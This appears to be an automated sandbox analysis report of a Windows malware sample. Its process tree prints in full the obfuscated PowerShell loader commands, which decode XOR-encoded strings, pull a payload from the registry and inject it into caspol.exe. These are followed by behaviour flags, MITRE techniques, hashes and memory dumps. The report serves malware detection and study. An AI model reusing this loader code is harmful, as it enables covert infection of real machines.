Ge'Sv1Bl4Ka6Ar9Ro5op5Al4Ko7Da4no3re1Bl0Cr0FiDBi1Kl0Ko6BaBUb6ry3Ta4St9To4Or3nr4Pr4Ku5en5Ne5FrDDe1inESp6Em2Uf4Se5An5CaECa4ud4Fr5Bo9Pa5WoDGa5Me5Sv1DrEGa7An9Pl5GiESh4Un4Lo5Ze5Se4Op2Sk5OvFKa4Pa0Ar6Sp3as5Re5Da4Or2De4Fe6Re5Im9Me5To3He5Su5Un4Ta3ve1HeEFl7LaDLa5ak1Ka4fo2Sm4In3te5Cl8In5Kn1Ko5ArCRg6UnDHa0NvASo0ReAor7Em7St5Pa5St4Su4An7Ga4Ch5Se5St5ChCpe5Or5En5Ek7Be5Fj1Sa4Se4Ve5sp5Ki7Pr6En5JeFre4Ge2sw7Jo6Es4Re5Hm5EnEGi5Pa3In4No4hu5Sp9Di5AuFaf5stECo6Af0Bo5FaFAt5Bu9Ha5MeEZa4Ba4to5Va5Ny4Ra2Fi1Te8Id1Tu8St5hr6He5HoBMa4Ch0rv1Er0Po1Rr4De7De4Co4No2Ab5Sa1Di4Gw7An5Di2Sl5Un1Mi5Me3Fl5HaBUd1Af0Bu1Un4Pl6Af9Fa5UnFze5St9Cy5Pi3Fo5CaBUn4Su3Fi0Sk4Sg1Di9Du1StCty1Be0Sm1Re8An7Na7De7Sa4Ha6Up4Ma1as0Re7Re0Su1Br8Fo6RrBSe7Of9Be5NvEAf4Di4Ar6ae0La4Ov4Se4Go2Re6ObDCh1TiCRr1Ri0Su6SnBGr6Lo5Ou7Di9Fl5PoEPe4Pa4Pi0ri3Az0En2Xm6MuDAq1YtCGi1Gl0He6MaBSq6Sn5Di7Sa9Sk5BiEHe4At4We0Br3Fo0So2Je6DeDDe1CoCDi1Re0Dd6TaBBr6Sk5Po7in9So5BeEFu4Pa4Ve0Ku3Cl0Kr2Na6ReDOv1lo9Vr1Ju0An1De8Jy6VaBRe7Un9Im5MuEKv4Pr4Ob6Ko0Ak4De4Se4Hy2Pr6NoDLo1En9Ku1Ra9Si1Ch9Bi'To;Fa&de(Bl`$SpYWhoSpiUdcUnksmsFr7Bo)Ro Kr`$InFDeoEvtHaosiklaoFapReiVaeLarPoeMa6Fi;Ac`$FoKEgaAkpDerfuoJenPriBenregRaeNerRunSaeae As=Be UnfclkAppTy Al`$WaYKroreiErcSnkAnsPl5Ti Me`$OpYFoohyiEpcAfkIosKa6Ta;Gr`$ToFKeoRitLeoPekVromipImiKaePerSaeko7Mo Da=Sq TmHKaTByBCh Ad'Te1gi4Ph6Em5Du5PrEBi5se4Fr5Ma5Fi5Te6By5Co5Fn5SlEZu4br3Fl5Re5St4Op3Sk0Ve3Fa1Ju0Un0HuDSp1ze0Gu1Fl4Ca6Om9Af5Sl5Bi4un7vi4Mi3Kl1GrECh7tr9Ks5AlEta4mi6De5ClFBe5AlBti5Po5Un1Ud8ur6ElBVi7Tr9Er5PrENo4Sk4Pr6Di0Ka4De4In4Fa2Be6OvDMi0CoABr0TeAPl6DeAke5Cr5Ov4Pa2To5MeFfo1frCSc1Pr0Bu0Id3Fo0Ar6Du0Po1No1FoCSe1ph0Fo0Pr0La4Nu8Mo0st3Be0Re0Ga0mi0Fr0ne0Kr1FoCSt1De0Ra0Tr0Hu4An8Un0Tr4Sv0Fi0Si1Ac9Ko'St;Af&Pr(Vo`$HyYSkoUniOvcMakStsOb7Do)ke Up`$DeFMiobotInoBakstoDepVeiTreCarPrema7Va;Lm`$FaFChoTetGeokakMooKrpFriKoeErrPreIm8Uk Be=Mo peHAeTHoBLy Nr'Me1re4Lo7kuBSe5Mi5Th5paDRe4Re0St4Bi4De1Pa0Pr0RuDSa1Li0Te1Be4Se6Sy9De5Be5Ar4My7Bi4Dh3Sk1OrEZo7Pr9Om5JvEHa4Sp6Ro5PiFGa5SiBBe5Br5De1Be8Tr6MuBNi7Fl9Ar5OmESu4Pa4Fu6in0Up4La4Hi4Be2Mo6ScDVe0SkAOv0ScAMi6LaAWo5Ge5Ce4Ra2Un5HiFJo1ShCRm1De0bl0al0Hu4Su8Un0me1Tr0Ek0Le0Ma0yd0Sr0fj0Fo0Cl0bl0Be1GtCmu1Ud0Un0Ne0Ar4Pa8Bu0Sp3Ur0Da0Ma0ba0Cr0pr0Sq1CeCPl1Te0Ae0Lr0ba4Ba8ba0Un4De1Re9In'To;Fy&Co(Ti`$ReYMioIsiOpcFokPysDe7Ko)In Mi`$FaFExoHotAloKakCaoJepMoiNoeUnrMeeCu8Pr;Or`$StFGejFreParoonSubMeeCatKejSeeIdnTviBrnNvgsceHorSonYaeBisUn=Ha(EfGZaeLetAr-UnIwotTaeSumSnPBarPloStpUneperFettryMe Ap-HaPPtaSntMnhbo Br'InHPaKKnCWoUFr:Ro\DySSkiDilUnkseeDalChrCorVaeCadAusNa\WaHGraUnaScrJesStkDykDeeStnId'Bo)Ki.FrPAcaOsnGetBaoCemMaiUnmAfeUnsFo;Ng`$OvFPhoBrtCioMakNaoSupNoiVaesirSaeKo9Re Th=Re BoHHvTkiBGn Mi'Sp1Fo4Al7Tw6Kl5RuFsa4Fy4Mi5AnFSa5ReBOv5BrFKo4Ub0De5Ta9Po5ho5Af4Pr2In5Po5Co1St0Gr0DaDNi1Ch0Me6VaBRe6Al3Le4Fo9Pa4Py3Hy4Ae4Sp5Ar5Un5FoDSo1EnESo7Vi3Ar5InFsk5HeEKo4Un6Kr5Ek5Zo4op2ge4Wi4Cy6veDRe0CoAUn0FeAVe7Co6Hm4Ma2Un5PrFCo5UdDGn7Wo2Op5Ka1Di4In3Vu5Un5Pe0En6Fl0Re4St6Gl3En4Vi4Ud4Me2Va5Bi9Op5ReERo5Vi7En1Th8Ba1Sw4De7Bl6Bu5upAAm5Ti5Gr4Cy2Al5IaEKn5me2Pt5Bl5Ho4Ko4Ja5PhARe5Kn5Ha5CoESp5To9Ny5AdEPr5Ha7Bl5In5Se4Dr2Di5PsESk5Al5Mn4Ca3ka1So9sh'Re;Su&Ro(bo`$PhYJuoCoiPrcEkkLisSt7Br)Ma He`$AlFBioBetKaoPakgeoPapBeiFeemorSoeSa9Re;Ab`$QeFSujJoeSprJenUdbSneRatSkjDeeBonstiArnfogSeeDerEpnvaeBasUn0Fa mi=co SaHNuTMaBSe Hy'Hv6ToBVo6Ot3Un4Ag9Li4Bo3Gu4Ov4Ji5Ac5Ga5KoDRy1DiEfi6So2Vo4No5Co5ToEsc4Mo4Fl5pe9St5NoDAn5Ve5Ar1KoEEv7Au9Sv5CoEBe4Es4He5ne5Ba4Na2Fl5ExFBi4Mi0Ap6Ma3Po5so5Gn4Sp2Pe4At6Se5Af9Se5hi3Co5In5Un4Qu3Sk1AmENo7PeDPl5Te1ba4Ku2Am4Ap3Hy5ov8Ab5sa1Pr5TiCRu6ChDFu0StAAn0guAPl7Uh3Fj5FeFWi4Pa0br4Un9Ga1Ud8Tj1He4Fo7El6Tr5ReFGr4Au4Re5PaFUn5AlBHu5ZeFIb4No0Pu5Vr9Sg5Me5Mo4He2Ka5Wh5Be1PrCTr1Me0Bl0Dy0Fo1FoCma1Kn0Le1Di0Fr1Ro4yn6No5Ri5ApEge5Pe4Pr5Ud5Di5Ex6De5Af5Ba5TeESy4Ak3Il5Wr5Co4He3Fr0Li3No1MaCKy1Un0na0al3Mo0Mi6De0Pa1Le1Mo9Re'Be;Ar&Ud(Te`$CeYNooCfiPecFukMisSl7of)Sp Fa`$StFNejDieNerTinMabMaePrtPljBaeapnGriRinStgBreHerBenEkeFosTo0su;Ho`$FaUGudEmeDebDiagenHaeMerSnnIneLa=Af`$MaFDooNotFloFokrioSupSpiYaeKirSeeBe.AscAnoOruBenMotVe-Co3st6En1Am;Sl`$usFCojPueNgrSlnmebToeHatWijSkeVenFiilenBegLeeYnrdanMaeBasKo1Gr Gn=Da PoHLaTStBSk Un'Sy6TkBUn6Vo3Pi4Un9fl4To3In4Da4Sn5Ch5Te5BeDLi1KaERe6Na2Ho4Pe5Ce5OdESc4So4Ve5gu9ja5BuDSl5br5Du1SaEde7Sa9Ns5HlEAr4Le4Me5Af5lr4To2Ma5MiFGa4Va0Il6Co3Re5Di5sl4Fi2In4Sy6be5Re9Sj5Ou3Ud5Sl5Sn4Sk3ae1WaEAu7SvDsa5Gr1Ud4Un2In4Sp3Fi5Ch8Ma5tv1Go5PeCBo6SkDBi0BlAAl0LeAfd7Tu3Mo5reFPh4Fo0Pa4Ly9Ka1In8Un1De4Lo7Sq6Pe5PrFde4me4Re5neFPu5OpBVa5BuFKa4Th0Ko5Fo9Rh5Sp5Fo4Je2Li5Pe5Un1TiCno1Pr0Sa0Dl3Bo0no6Ch0Te1Pe1BeCGa1An0Or1Va4Ba7TeBSh5Ba5Ur5glDKa4In0Be4Co4es1AaCPl1Of0De1Ko4Ti6Er5Ri5Su4Xa5ac5Pa5Ag2Br5Co1Ga5PaEEn5Ti5Fa4We2Pa5CaEDe5Fj5Kl1Fi9ex'sp;No&Aa(Hu`$DoYMooouiWecEmkAssYo7Ho)Is Le`$pyFSajVoeGlrDenOvbVaeSmtVejUneZonOniAlnOpgEteHyrStnRoeUnsSk1Ge;Al`$ThFLejPreAvrLrnspbPreDatNojseeCnnSliSanThgBeeUrrPdnMieDrsRi2Be Ha=Pi boHUnTStBCo Se'Tr1Tr4Sk7LaDRu5Br4Au5ne5Pe5Hy9Ul5goEPh5Pr4Ma5Gr2fe4pr9Be5Yo4Na5Us5Ex5VuCSk4Dr3Al5Qu5Ka1Ow0Fe0MaDQu1Re0So6DeBLi6Dr3Re4Ka9Ba4Hu3Dr4Pr4Ne5Pe5De5LiDSk1RoEIn6In2Se4Ru5Ad5TiEDe4Se4Sp5Tr9Fo5PaDfr5Ka5Pa1GrESt7Ko9Ho5ArEBl4So4Ap5Di5Ag4Ke2De5TrFBl4Br0Fe6Me3Ge5Pr5Ex4Ov2An4Un6Ki5Me9Bi5Te3So5Br5sk4Un3Un1joEtu7SoDAf5Sk1Pr4Tr2No4Ti3Me5Ba8Un5Un1Gu5AmCPo6BeDPa0CrAMa0luAMa7Bl7Fo5Pe5Sc4Os4Lu7Do4Ga5Ca5Fo5HoCSp5Rr5Ko5So7Di5Un1Si4Ma4Jo5As5Gu7Rk6Ka5SeFRe4Ko2Im7Kr6La4In5Vu5UnERa5At3Ya4Se4Un5Ov9Bn5HuFIn5MiERe6Za0Pl5SkFOe5Ca9su5LoETr4Jo4Os5Ul5Sl4Ku2Fo1St8Se1Sc4Wh6Bo5St5UnEPr5Be4Ha5Bu5Py5Un6Pt5Ba5To5CoEUn4Sp3Je5Du5Dk4Eg3Go0Va3Ac1FlCTi1St0Co1am8Wi7De7Ow7Lo4Mi6Ve4Co1Tr0Dr7Fi0ba1Un8St6UnBPr7Te9Ko5PrEPy4Bu4Mo6Su0Bo4As4Ro4Mi2pu6LeDHu1OmCIn6SaBUn7An9Un5EnEGa4Ba4br6Do0Gr4Ga4Sa4Je2Mo6InDAp1Ya9wi1De0St1Jv8Ho6IaBSc6Ag6St5ViFSp5Re9Me5Pa4so6SuDSk1Tr9Pr1Na9Bl1Ra9op'Re;Ka&Bi(cy`$SkYPloBaiCocElkSksPo7Bo)Ke To`$RaFBrjAbeSkrPanSubExeSjtRojSeeSenGliKonFrgAveinrKnnEneSusAn2Ej;Ba`$AmFvejBueInrEmnFibEseCotTijPoeHunRiiDanSagfrenerBanSiePasBl3De Li=Mi FeHTrTApBFe Pa'Kr1Ud4Cu7PuDLa5Hu4My5Re5Ch5Re9Av5CuEFa5Sh4Un5Va2Sk4Na9Bu5Ov4Rg5Mi5Ca5AnCJo4Ka3fr5Sp5Pa1NoEPa7Tr9La5ToEIn4Ta6Be5PeFTi5MaBSe5Ro5Ou1sk8la1Hi4Ov7AnBTe5Fo5Ne5FlDUd4Ob0De4Ti4Fo1FoCan1co4Fr7JoBFi5Bo1Do4Sp0St4Pi2Li5HaFHs5HeEBo5To9Un5FoEUn5Lu7Su5An5Ug4Hd2Dr5AlESp5Fe5Be1Gl9st'In;Fa&Sy(Cy`$FiYUdoGeiMicBokClsto7En)Fa ge`$DiFBojJueMirNrnNdbSceAutInjKnemonStiSpnAlgBaeTerTynNoeOrsTr3Ud#Sk;""";Function Fjernbetjeningernes9 { param([String]$Godtedes); For($Momsfri=2; $Momsfri -lt $Godtedes.Length-1; $Momsfri+=(2+1)){ $Pudsene = $Pudsene + $Godtedes.Substring($Momsfri, 1); } $Pudsene;}$Linguistical0 = Fjernbetjeningernes9 'InIRaETiXtr ';$Linguistical1= Fjernbetjeningernes9 $Hjulpiskers;if([IntPtr]::size -eq 8){START-job { param($silica) powershell $silica } -RunAs32 -Argument $Linguistical1 | wait-job | Receive-Job;}else{&$Linguistical0 $Linguistical1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4920
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3556
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Godtedes); $Shippings = New-Object byte[] ($Godtedes.Length / 2); For($Momsfri=0; $Momsfri -lt $Godtedes.Length; $Momsfri+=2){ $Shippings[$Momsfri/2] = [convert]::ToByte($Godtedes.Substring($Momsfri, 2), 16); $Shippings[$Momsfri/2] = ($Shippings[$Momsfri/2] -bxor 48); } [String][System.Text.Encoding]::ASCII.GetString($Shippings);}$Piloterings0=HTB '63494344555D1E545C5C';$Piloterings1=HTB '7D5953425F435F56441E67595E03021E655E435156557E51445946557D5544585F5443';$Piloterings2=HTB '77554460425F5371545442554343';$Piloterings3=HTB '63494344555D1E62455E44595D551E795E4455425F4063554246595355431E78515E545C55625556';$Piloterings4=HTB '434442595E57';$Piloterings5=HTB '7755447D5F54455C5578515E545C55';$Piloterings6=HTB '62646340555359515C7E515D551C107859545572496359571C106045525C5953';$Piloterings7=HTB '62455E44595D551C107D515E51575554';$Piloterings8=HTB '6255565C555344555474555C5557514455';$Piloterings9=HTB '795E7D555D5F42497D5F54455C55';$Yoicks0=HTB '7D4974555C555751445564494055';$Yoicks1=HTB '735C5143431C106045525C59531C106355515C55541C10715E4359735C5143431C107145445F735C514343';$Yoicks2=HTB '795E465F5B55';$Yoicks3=HTB '6045525C59531C107859545572496359571C107E5547635C5F441C106659424445515C';$Yoicks4=HTB '6659424445515C715C5C5F53';$Yoicks5=HTB '5E44545C5C';$Yoicks6=HTB '7E4460425F445553446659424445515C7D555D5F4249';$Yoicks7=HTB '797568';$Yoicks8=HTB '6C';function fkp {Param ($Tabelopstillingen, $litograferne) ;$Fotokopiere0 =HTB '147255514252555A545E595E57555E43100D10186B714040745F5D51595E6D0A0A73454242555E44745F5D51595E1E775544714343555D525C5955431819104C1067585542551D7F525A555344104B10146F1E775C5F52515C714343555D525C497351535855101D715E5410146F1E7C5F535144595F5E1E63405C59441814695F59535B4308196B1D016D1E754145515C43181460595C5F445542595E57430019104D191E77554464494055181460595C5F445542595E57430119';&($Yoicks7) $Fotokopiere0;$Fotokopiere5 = HTB '14725F44565C49100D10147255514252555A545E595E57555E431E7755447D5544585F54181460595C5F445542595E5743021C106B644940556B6D6D1070181460595C5F445542595E5743031C101460595C5F445542595E5743041919';&($Yoicks7) $Fotokopiere5;$Fotokopiere1 = HTB '42554445425E1014725F44565C491E795E465F5B5518145E455C5C1C1070186B63494344555D1E62455E44595D551E795E4455425F4063554246595355431E78515E545C556255566D187E55471D7F525A5553441063494344555D1E62455E44595D551E795E4455425F4063554246595355431E78515E545C5562555618187E55471D7F525A55534410795E44604442191C1018147255514252555A545E595E57555E431E7755447D5544585F54181460595C5F445542595E57430519191E795E465F5B5518145E455C5C1C10701814645152555C5F404344595C5C595E57555E191919191C10145C59445F5742515655425E551919';&($Yoicks7) $Fotokopiere1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Hypersexual,[Parameter(Position = 1)] [Type] $Towboat = [Void]);$Fotokopiere2 = HTB '146358555544515755100D106B714040745F5D51595E6D0A0A73454242555E44745F5D51595E1E745556595E5574495E515D5953714343555D525C4918187E55471D7F525A5553441063494344555D1E6255565C555344595F5E1E714343555D525C497E515D55181460595C5F445542595E57430819191C106B63494344555D1E6255565C555344595F5E1E755D59441E714343555D525C497245595C5455427153535543436D0A0A62455E191E745556595E5574495E515D59537D5F54455C55181460595C5F445542595E5743091C101456515C4355191E745556595E55644940551814695F59535B43001C1014695F59535B43011C106B63494344555D1E7D455C44595351434474555C55575144556D19';&($Yoicks7) $Fotokopiere2;$Fotokopiere3 = HTB '1463585555445157551E745556595E55735F5E4344424553445F42181460595C5F445542595E5743061C106B63494344555D1E6255565C555344595F5E1E73515C5C595E57735F5E46555E44595F5E436D0A0A6344515E545142541C1014784940554243554845515C191E635544795D405C555D555E445144595F5E765C515743181460595C5F445542595E57430719';&($Yoicks7) $Fotokopiere3;$Fotokopiere4 = HTB '1463585555445157551E745556595E557D5544585F541814695F59535B43021C1014695F59535B43031C1014645F47525F51441C1014784940554243554845515C191E635544795D405C555D555E445144595F5E765C515743181460595C5F445542595E57430719';&($Yoicks7) $Fotokopiere4;$Fotokopiere5 = HTB '42554445425E101463585555445157551E734255514455644940551819';&($Yoicks7) $Fotokopiere5 ;}$Drawback = HTB '5B55425E555C0302';$Fotokopiere6 = HTB '1469554743100D106B63494344555D1E62455E44595D551E795E4455425F4063554246595355431E7D51424358515C6D0A0A77554474555C5557514455765F4276455E5344595F5E605F595E4455421818565B401014744251475251535B1014695F59535B4304191C10187774641070186B795E446044426D1C106B65795E4403026D1C106B65795E4403026D1C106B65795E4403026D1910186B795E446044426D191919';&($Yoicks7) $Fotokopiere6;$Kaproningerne = fkp $Yoicks5 $Yoicks6;$Fotokopiere7 = HTB '14655E545556555E43554303100D1014695547431E795E465F5B55186B795E446044426D0A0A6A55425F1C100306011C100048030000001C100048040019';&($Yoicks7) $Fotokopiere7;$Fotokopiere8 = HTB '147B555D4044100D1014695547431E795E465F5B55186B795E446044426D0A0A6A55425F1C1000480100000000001C100048030000001C1000480419';&($Yoicks7) $Fotokopiere8;$Fjernbetjeningernes=(Get-ItemProperty -Path 'HKCU:\Silkelrreds\Haarskken').Pantomimes;$Fotokopiere9 = HTB '14765F445F5B5F4059554255100D106B63494344555D1E735F5E465542446D0A0A76425F5D725143550604634442595E571814765A55425E5255445A555E595E5755425E554319';&($Yoicks7) $Fotokopiere9;$Fjernbetjeningernes0 = HTB '6B63494344555D1E62455E44595D551E795E4455425F4063554246595355431E7D51424358515C6D0A0A735F40491814765F445F5B5F40595542551C10001C101014655E545556555E435543031C1003060119';&($Yoicks7) $Fjernbetjeningernes0;$Udebanerne=$Fotokopiere.count-361;$Fjernbetjeningernes1 = HTB '6B63494344555D1E62455E44595D551E795E4455425F4063554246595355431E7D51424358515C6D0A0A735F40491814765F445F5B5F40595542551C100306011C10147B555D40441C101465545552515E55425E5519';&($Yoicks7) $Fjernbetjeningernes1;$Fjernbetjeningernes2 = HTB '147D5455595E54524954555C4355100D106B63494344555D1E62455E44595D551E795E4455425F4063554246595355431E7D51424358515C6D0A0A77554474555C5557514455765F4276455E5344595F5E605F595E4455421814655E545556555E435543031C10187774641070186B795E446044426D1C6B795E446044426D1910186B665F59546D191919';&($Yoicks7) $Fjernbetjeningernes2;$Fjernbetjeningernes3 = HTB '147D5455595E54524954555C43551E795E465F5B5518147B555D40441C147B5140425F5E595E5755425E5519';&($Yoicks7) $Fjernbetjeningernes3#"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4480
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
        5⤵
        Checks QEMU agent file
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4660

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6c73df1bb0c83bf158c1aebc058fbdd2

SHA1
c3f64dbe2337cf4be331efaed86e600076d613cf

SHA256
2bfd8c972f6bb05ae1adca5237a7210d569fb1f9662ad4dd6bfc4e00e88d17ba

SHA512
a9093e7a6808cbe9aa86eb9eb1d50513e942800da5ffc9685c670a34d2349019caa65705dcd6e959de4b066673e3c45b64b5a94b7589c057817ec61eb65188e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
548e21a8f5e2c98bf35e935495e36c05

SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398

SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d

SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
2bcfce2b951487e14859649268b145cb

SHA1
7a219881fd0c1c28e08c4d1905f32845b49073a9

SHA256
2b0ffee4b25877a4e08f989ae9a6f6fea590345549cc73ed9a8f82608b285e6b

SHA512
87052dfc32a178fb0b3c29b57d9c58a5f04a9edf6e41ec991dc25d7e94c170763a4f8cf4c08efb83bec6f86e8ebd1ddc1e7c718cc462a1e54af663a3f0195f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
29a79f95fb2502924a850d263e5852b7

SHA1
3b395e9b0be540792284d58edbcb8c03e464bed9

SHA256
d11ba5e3294570ac864fe542c0c13f09be32b587d365382e3172f04491544246

SHA512
8399b9ca24345e19f1e971716c884c2781b5b896c1ee25fa0064067ea05edc633b6281915a9e79d0cfaf1e4143ad4b4495deecaa6e4a8fcdeb057ebf31dd2895

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
a1106447f8fd488820bb459a7c77654f

SHA1
ebd1139ec8175e7b6f8f00df8ac27fea4c0f3d44

SHA256
8895e9f4da9017586761e3b066e386ff3e7acce9e75c9c71f90fcd097c42e58a

SHA512
f7ed2bf8cc8e3c7b3d9ea12d0220d6ca9f9958610b934de878cb2da7470b81b8dde818a2b6e811701af00e411115cb84e82bfbe6095b376001fbb353eb180c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8d972fba81431f985a5b5c7d9764e193

SHA1
495ea6ea3f3f18df86aefc431226cd74b566ac54

SHA256
29ba4ebdc30fd70d9dc6abfb20a576d696989fe5dee0be04c64df746ea119f50

SHA512
ad8d881d5aae0b194c8a19602afdbc3eb8e9064f1274456558827d1ae3eff447fc75a8350c59c70157b0ec631f0e8dc3678eeae3e9e2aa14e9477f037219d864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8d972fba81431f985a5b5c7d9764e193

SHA1
495ea6ea3f3f18df86aefc431226cd74b566ac54

SHA256
29ba4ebdc30fd70d9dc6abfb20a576d696989fe5dee0be04c64df746ea119f50

SHA512
ad8d881d5aae0b194c8a19602afdbc3eb8e9064f1274456558827d1ae3eff447fc75a8350c59c70157b0ec631f0e8dc3678eeae3e9e2aa14e9477f037219d864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
b37f26cf29e38a852a0e80874c42214d

SHA1
32f9eeb3ba4b9c8be7ce57b428abdbae2657dffc

SHA256
fc35477b19158e0c4b43131a8d7cd54762f4d9b8d294310b2233f90b4839316c

SHA512
c2de9c21ad4e94aab4579620a0ec9b7b6fd996e63efd3c970d135193057532c5b4f3e2b50893c272985901c7c4327b131468e6b582b52fc3ce8d04c85babbcec

Download Submit
memory/3556-142-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/3556-140-0x0000000005810000-0x0000000005832000-memory.dmp

Filesize
136KB

Download
memory/3556-143-0x00000000067E0000-0x00000000067FE000-memory.dmp

Filesize
120KB

Download
memory/3556-138-0x0000000005120000-0x0000000005156000-memory.dmp

Filesize
216KB

Download
memory/3556-145-0x00000000077B0000-0x0000000007E2A000-memory.dmp

Filesize
6.5MB

Download
memory/3556-146-0x0000000006D30000-0x0000000006D4A000-memory.dmp

Filesize
104KB

Download
memory/3556-139-0x0000000005900000-0x0000000005F28000-memory.dmp

Filesize
6.2MB

Download
memory/3556-141-0x0000000005F30000-0x0000000005F96000-memory.dmp

Filesize
408KB

Download
memory/4480-147-0x0000000007770000-0x0000000007806000-memory.dmp

Filesize
600KB

Download
memory/4480-161-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4480-152-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download
memory/4480-153-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download
memory/4480-149-0x00000000075A0000-0x00000000075C2000-memory.dmp

Filesize
136KB

Download
memory/4480-150-0x0000000008920000-0x0000000008EC4000-memory.dmp

Filesize
5.6MB

Download
memory/4480-166-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4480-158-0x00007FFC1CC50000-0x00007FFC1CE45000-memory.dmp

Filesize
2.0MB

Download
memory/4480-159-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4480-164-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4660-167-0x0000000000630000-0x0000000000730000-memory.dmp

Filesize
1024KB

Download
memory/4660-162-0x0000000000630000-0x0000000000730000-memory.dmp

Filesize
1024KB

Download
memory/4660-169-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4660-168-0x00007FFC1CC50000-0x00007FFC1CE45000-memory.dmp

Filesize
2.0MB

Download
memory/4660-170-0x00000000776D0000-0x0000000077873000-memory.dmp

Filesize
1.6MB

Download
memory/4920-148-0x00007FFBFEE30000-0x00007FFBFF8F1000-memory.dmp

Filesize
10.8MB

Download
memory/4920-135-0x000001D0F4B80000-0x000001D0F4CF6000-memory.dmp

Filesize
1.5MB

Download
memory/4920-136-0x000001D0F4F10000-0x000001D0F511A000-memory.dmp

Filesize
2.0MB

Download
memory/4920-134-0x00007FFBFEE30000-0x00007FFBFF8F1000-memory.dmp

Filesize
10.8MB

Download
memory/4920-133-0x000001D0F24A0000-0x000001D0F24C2000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads